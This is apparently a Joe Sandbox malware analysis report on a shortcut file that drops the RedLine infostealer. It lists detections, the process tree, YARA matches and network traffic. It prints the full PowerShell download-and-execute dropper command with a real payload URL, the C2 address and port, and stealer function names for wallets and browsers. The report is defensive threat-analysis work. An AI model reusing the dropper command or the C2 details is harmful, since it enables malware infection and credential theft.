Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
07ff580e-3cfd-4c41-a92e-4ba534dd1a0a.lnk

Overview

General Information

Sample Name:07ff580e-3cfd-4c41-a92e-4ba534dd1a0a.lnk
Analysis ID:796782
MD5:ef7f9739337bc657cd0a63e32e27d0a1
SHA1:bf67555a7272f24ceb57b1c49e4cf37dc17b246f
SHA256:a517abf69af75cef34cc2db14981ea42b2ef4424c140e37363f80badb2353c6c
Tags:lnk
Infos:

Detection

RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected RedLine Stealer
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Windows shortcut file (LNK) starts blacklisted processes
Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Found URL in windows shortcut file (LNK)
Bypasses PowerShell execution policy
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Yara detected Costura Assembly Loader
Encrypted powershell cmdline option found
Uses known network protocols on non-standard ports
Tries to download and execute files (via powershell)
Suspicious powershell command line found
Machine Learning detection for sample
Injects a PE file into a foreign processes
Powershell drops PE file
Yara detected Generic Downloader
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
Uses insecure TLS / SSL version for HTTPS connection
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Drops PE files
Detected TCP or UDP traffic on non-standard ports
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • powershell.exe (PID: 4852 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('https://oiartzunirratia.eus/install/clean/Lcovlccdxd.exe','C:\Users\user\AppData\Roaming\svhost.exe');Start-Process 'C:\Users\user\AppData\Roaming\svhost.exe' MD5: 95000560239032BC68B4C2FDFCDEF913)
    • conhost.exe (PID: 1592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • svhost.exe (PID: 4768 cmdline: "C:\Users\user\AppData\Roaming\svhost.exe" MD5: D3713110654DC546BD5EDC306A6E7EFD)
      • powershell.exe (PID: 4816 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA== MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • conhost.exe (PID: 3584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • svhost.exe (PID: 5428 cmdline: C:\Users\user\AppData\Roaming\svhost.exe MD5: D3713110654DC546BD5EDC306A6E7EFD)
        • conhost.exe (PID: 5540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • Opgcxhsdw.exe (PID: 624 cmdline: "C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exe" MD5: D3713110654DC546BD5EDC306A6E7EFD)
    • powershell.exe (PID: 2432 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA== MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 3172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • Opgcxhsdw.exe (PID: 5216 cmdline: "C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exe" MD5: D3713110654DC546BD5EDC306A6E7EFD)
    • powershell.exe (PID: 2164 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA== MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 3216 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: RedLine

{"C2 url": ["194.26.192.248:7053"], "Bot Id": "cheat"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
07ff580e-3cfd-4c41-a92e-4ba534dd1a0a.lnkSUSP_LNK_SuspiciousCommandsDetects LNK file with suspicious contentFlorian Roth (Nextron Systems)
  • 0x317:$s7: -noprofile
  • 0x399:$s9: .DownloadFile(

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_RedLineYara detected RedLine StealerJoe Security
    dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000002.00000002.428265959.0000000004151000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
        00000002.00000002.428265959.0000000004151000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000002.00000002.428265959.0000000004151000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_f54632ebunknownunknown
          • 0x178fa:$a4: get_ScannedWallets
          • 0x16758:$a5: get_ScanTelegram
          • 0x1757e:$a6: get_ScanGeckoBrowsersPaths
          • 0x1539a:$a7: <Processes>k__BackingField
          • 0x132ac:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
          • 0x14cce:$a9: <ScanFTP>k__BackingField
          00000002.00000002.424099399.0000000003173000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
            0000000A.00000002.587414248.00000000025CD000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
              Click to see the 26 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              2.2.svhost.exe.5960000.6.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                2.2.svhost.exe.4222060.4.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                  2.2.svhost.exe.4222060.4.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                    2.2.svhost.exe.4222060.4.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
                    • 0xe68a:$u7: RunPE
                    • 0x11d41:$u8: DownloadAndEx
                    • 0x7330:$pat14: , CommandLine:
                    • 0x11279:$v2_1: ListOfProcesses
                    • 0xe88b:$v2_2: get_ScanVPN
                    • 0xe92e:$v2_2: get_ScanFTP
                    • 0xf61e:$v2_2: get_ScanDiscord
                    • 0x1060c:$v2_2: get_ScanSteam
                    • 0x10628:$v2_2: get_ScanTelegram
                    • 0x106ce:$v2_2: get_ScanScreen
                    • 0x11416:$v2_2: get_ScanChromeBrowsersPaths
                    • 0x1144e:$v2_2: get_ScanGeckoBrowsersPaths
                    • 0x11709:$v2_2: get_ScanBrowsers
                    • 0x117ca:$v2_2: get_ScannedWallets
                    • 0x117f0:$v2_2: get_ScanWallets
                    • 0x11810:$v2_3: GetArguments
                    • 0xfed9:$v2_4: VerifyUpdate
                    • 0x147ea:$v2_4: VerifyUpdate
                    • 0x11bca:$v2_5: VerifyScanRequest
                    • 0x112c6:$v2_6: GetUpdates
                    • 0x147cb:$v2_6: GetUpdates
                    2.2.svhost.exe.4222060.4.unpackWindows_Trojan_RedLineStealer_f54632ebunknownunknown
                    • 0x117ca:$a4: get_ScannedWallets
                    • 0x10628:$a5: get_ScanTelegram
                    • 0x1144e:$a6: get_ScanGeckoBrowsersPaths
                    • 0xf26a:$a7: <Processes>k__BackingField
                    • 0xd17c:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
                    • 0xeb9e:$a9: <ScanFTP>k__BackingField
                    Click to see the 30 entries

                    Other

                    SourceRuleDescriptionAuthorStrings
                    amsi64_4852.amsi.csvSuspicious_PowerShell_WebDownload_1Detects suspicious PowerShell code that downloads from web sitesFlorian Roth (Nextron Systems)
                    • 0x6a:$s3: System.Net.WebClient).DownloadFile('http

                    Sigma Signatures

                    No Sigma rule has matched

                    Snort Signatures

                    No Snort rule has matched

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Multi AV Scanner detection for submitted file
                    Source: 07ff580e-3cfd-4c41-a92e-4ba534dd1a0a.lnkReversingLabs: Detection: 74%
                    Source: 07ff580e-3cfd-4c41-a92e-4ba534dd1a0a.lnkVirustotal: Detection: 59%Perma Link
                    Antivirus / Scanner detection for submitted sample
                    Source: 07ff580e-3cfd-4c41-a92e-4ba534dd1a0a.lnkAvira: detected
                    Antivirus detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exeAvira: detection malicious, Label: TR/Dropper.MSIL.Gen
                    Source: C:\Users\user\AppData\Roaming\svhost.exeAvira: detection malicious, Label: TR/Dropper.MSIL.Gen
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exeReversingLabs: Detection: 41%
                    Source: C:\Users\user\AppData\Roaming\svhost.exeReversingLabs: Detection: 41%
                    Machine Learning detection for sample
                    Source: 07ff580e-3cfd-4c41-a92e-4ba534dd1a0a.lnkJoe Sandbox ML: detected
                    Machine Learning detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Roaming\svhost.exeJoe Sandbox ML: detected
                    Source: 2.0.svhost.exe.d30000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen
                    Source: 00000002.00000002.428265959.0000000004151000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: RedLine {"C2 url": ["194.26.192.248:7053"], "Bot Id": "cheat"}
                    Source: unknownHTTPS traffic detected: 185.101.226.22:443 -> 192.168.2.4:49696 version: TLS 1.0
                    Source: C:\Users\user\AppData\Roaming\svhost.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h

                    Networking

                    barindex
                    Uses known network protocols on non-standard ports
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 7053
                    Source: unknownNetwork traffic detected: HTTP traffic on port 7053 -> 49697
                    Source: unknownNetwork traffic detected: HTTP traffic on port 7053 -> 49697
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 7053
                    Source: unknownNetwork traffic detected: HTTP traffic on port 7053 -> 49697
                    Source: unknownNetwork traffic detected: HTTP traffic on port 7053 -> 49697
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 7053
                    Source: unknownNetwork traffic detected: HTTP traffic on port 7053 -> 49697
                    Source: unknownNetwork traffic detected: HTTP traffic on port 7053 -> 49697
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 7053
                    Source: unknownNetwork traffic detected: HTTP traffic on port 7053 -> 49697
                    Source: unknownNetwork traffic detected: HTTP traffic on port 7053 -> 49697
                    Yara detected Generic Downloader
                    Source: Yara matchFile source: 2.2.svhost.exe.4222060.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.svhost.exe.41dca40.2.raw.unpack, type: UNPACKEDPE
                    C2 URLs / IPs found in malware configuration
                    Source: Malware configuration extractorURLs: 194.26.192.248:7053
                    Source: Joe Sandbox ViewASN Name: HOSTINET_ASES HOSTINET_ASES
                    Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                    Source: global trafficHTTP traffic detected: GET /install/clean/Lcovlccdxd.exe HTTP/1.1Host: oiartzunirratia.eusConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 194.26.192.248:7053Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: 194.26.192.248:7053Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: 194.26.192.248:7053Content-Length: 1146942Expect: 100-continueAccept-Encoding: gzip, deflate
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: 194.26.192.248:7053Content-Length: 1146934Expect: 100-continueAccept-Encoding: gzip, deflate
                    Source: unknownHTTPS traffic detected: 185.101.226.22:443 -> 192.168.2.4:49696 version: TLS 1.0
                    Source: global trafficTCP traffic: 192.168.2.4:49697 -> 194.26.192.248:7053
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49696
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49696 -> 443
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.26.192.248
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.26.192.248
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.26.192.248
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.26.192.248
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.26.192.248
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.26.192.248
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.26.192.248
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.26.192.248
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.26.192.248
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.26.192.248
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.26.192.248
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.26.192.248
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.26.192.248
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.26.192.248
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.26.192.248
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.26.192.248
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.26.192.248
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.26.192.248
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.26.192.248
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.26.192.248
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.26.192.248
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.26.192.248
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.26.192.248
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.26.192.248
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.26.192.248
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.26.192.248
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.26.192.248
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.26.192.248
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.26.192.248
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.26.192.248
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.26.192.248
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.26.192.248
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.26.192.248
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.26.192.248
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.26.192.248
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.26.192.248
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.26.192.248
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.26.192.248
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.26.192.248
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.26.192.248
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.26.192.248
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.26.192.248
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.26.192.248
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.26.192.248
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.26.192.248
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.26.192.248
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.26.192.248
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.26.192.248
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.26.192.248
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.26.192.248
                    Source: svhost.exe, 00000007.00000002.587473199.00000000032EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.26.192.248:7053
                    Source: svhost.exe, 00000007.00000002.587473199.0000000003261000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.26.192.248:7053/
                    Source: svhost.exe, 00000007.00000002.587473199.00000000032EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.26.192.248:70534
                    Source: powershell.exe, 00000000.00000002.381690727.000001D9F43C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                    Source: svhost.exe, 00000002.00000002.424099399.0000000003173000.00000004.00000800.00020000.00000000.sdmp, Opgcxhsdw.exe, 00000009.00000002.587061238.000000000352F000.00000004.00000800.00020000.00000000.sdmp, Opgcxhsdw.exe, 0000000A.00000002.587414248.00000000025CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://james.newtonking.com/projects/json
                    Source: powershell.exe, 00000000.00000002.378116200.000001D9EC443000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.328014232.000001D9DC4AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.378116200.000001D9EC301000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                    Source: powershell.exe, 00000000.00000002.328014232.000001D9DD5E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://oiartzunirratia.eus
                    Source: powershell.exe, 00000000.00000002.328014232.000001D9DC4AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                    Source: svhost.exe, 00000007.00000002.587473199.0000000003261000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                    Source: svhost.exe, 00000007.00000002.587473199.00000000032FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                    Source: svhost.exe, 00000007.00000002.587473199.0000000003303000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/D
                    Source: svhost.exe, 00000007.00000002.587473199.0000000003261000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                    Source: svhost.exe, 00000007.00000002.587473199.0000000003261000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
                    Source: svhost.exe, 00000007.00000002.587473199.0000000003261000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                    Source: powershell.exe, 00000000.00000002.328014232.000001D9DC2A1000.00000004.00000800.00020000.00000000.sdmp, svhost.exe, 00000007.00000002.587473199.00000000032EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: svhost.exe, 00000007.00000002.587473199.00000000032FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
                    Source: svhost.exe, 00000007.00000002.587473199.00000000032FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/0
                    Source: svhost.exe, 00000007.00000002.587473199.0000000003261000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/
                    Source: svhost.exe, 00000007.00000002.587473199.00000000032EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnect
                    Source: svhost.exe, 00000007.00000002.587473199.0000000003261000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnectResponse
                    Source: svhost.exe, 00000007.00000002.587473199.0000000003261000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettings
                    Source: svhost.exe, 00000007.00000002.587473199.0000000003261000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsResponse
                    Source: svhost.exe, 00000007.00000002.587473199.0000000003261000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdates
                    Source: svhost.exe, 00000007.00000002.587473199.0000000003261000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
                    Source: svhost.exe, 00000007.00000002.587473199.0000000003261000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironment
                    Source: svhost.exe, 00000007.00000002.587473199.0000000003261000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentResponse
                    Source: svhost.exe, 00000007.00000002.587473199.0000000003261000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdate
                    Source: svhost.exe, 00000007.00000002.587473199.0000000003261000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
                    Source: powershell.exe, 00000000.00000002.328014232.000001D9DC4AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                    Source: svhost.exe, 00000002.00000002.428265959.0000000004151000.00000004.00000800.00020000.00000000.sdmp, svhost.exe, 00000002.00000002.428265959.0000000004197000.00000004.00000800.00020000.00000000.sdmp, svhost.exe, 00000002.00000002.424099399.0000000003278000.00000004.00000800.00020000.00000000.sdmp, svhost.exe, 00000007.00000002.580544741.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
                    Source: svhost.exe, 00000002.00000002.428265959.0000000004151000.00000004.00000800.00020000.00000000.sdmp, svhost.exe, 00000002.00000002.428265959.0000000004197000.00000004.00000800.00020000.00000000.sdmp, svhost.exe, 00000002.00000002.424099399.0000000003278000.00000004.00000800.00020000.00000000.sdmp, svhost.exe, 00000007.00000002.580544741.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.orgcookies//settinString.Removeg
                    Source: svhost.exe, 00000002.00000002.424099399.0000000003173000.00000004.00000800.00020000.00000000.sdmp, Opgcxhsdw.exe, 00000009.00000002.587061238.000000000352F000.00000004.00000800.00020000.00000000.sdmp, Opgcxhsdw.exe, 0000000A.00000002.587414248.00000000025CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                    Source: powershell.exe, 00000000.00000002.378116200.000001D9EC301000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 00000000.00000002.378116200.000001D9EC301000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 00000000.00000002.378116200.000001D9EC301000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                    Source: powershell.exe, 00000000.00000002.328014232.000001D9DC4AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                    Source: powershell.exe, 00000000.00000002.328014232.000001D9DDB4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                    Source: svhost.exe, 00000002.00000002.428265959.0000000004151000.00000004.00000800.00020000.00000000.sdmp, svhost.exe, 00000002.00000002.428265959.0000000004197000.00000004.00000800.00020000.00000000.sdmp, svhost.exe, 00000002.00000002.424099399.0000000003278000.00000004.00000800.00020000.00000000.sdmp, svhost.exe, 00000007.00000002.580544741.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/ip%appdata%
                    Source: powershell.exe, 00000000.00000002.378116200.000001D9EC443000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.328014232.000001D9DC4AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.378116200.000001D9EC301000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                    Source: powershell.exe, 00000000.00000002.328014232.000001D9DD5D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oiartzunirratia.eus
                    Source: powershell.exe, 00000000.00000002.327507977.000001D9DA359000.00000004.00000020.00020000.00000000.sdmp, 07ff580e-3cfd-4c41-a92e-4ba534dd1a0a.lnkString found in binary or memory: https://oiartzunirratia.eus/install/clean/Lcovlccdxd.exe
                    Source: powershell.exe, 00000000.00000002.328014232.000001D9DC4AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oiartzunirratia.eus/install/clean/Lcovlccdxd.exe0y
                    Source: powershell.exe, 00000000.00000002.328014232.000001D9DD5E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oiartzunirratia.eusx
                    Source: svhost.exe, 00000002.00000002.457069212.00000000056E0000.00000004.08000000.00040000.00000000.sdmp, svhost.exe, 00000002.00000002.428265959.0000000004197000.00000004.00000800.00020000.00000000.sdmp, svhost.exe, 00000002.00000002.428265959.0000000004760000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.newtonsoft.com/jsonschema
                    Source: svhost.exe, 00000002.00000002.457069212.00000000056E0000.00000004.08000000.00040000.00000000.sdmp, svhost.exe, 00000002.00000002.428265959.0000000004197000.00000004.00000800.00020000.00000000.sdmp, svhost.exe, 00000002.00000002.428265959.0000000004760000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
                    Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 194.26.192.248:7053Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                    Source: unknownDNS traffic detected: queries for: oiartzunirratia.eus
                    Source: global trafficHTTP traffic detected: GET /install/clean/Lcovlccdxd.exe HTTP/1.1Host: oiartzunirratia.eusConnection: Keep-Alive

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 2.2.svhost.exe.4222060.4.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 2.2.svhost.exe.4222060.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 2.2.svhost.exe.3292bc8.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 2.2.svhost.exe.3292bc8.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 7.2.svhost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 7.2.svhost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 2.2.svhost.exe.3292bc8.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 2.2.svhost.exe.3292bc8.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 2.2.svhost.exe.4222060.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 2.2.svhost.exe.4222060.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 2.2.svhost.exe.41dca40.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 2.2.svhost.exe.41dca40.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 00000002.00000002.428265959.0000000004151000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 00000007.00000002.580544741.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
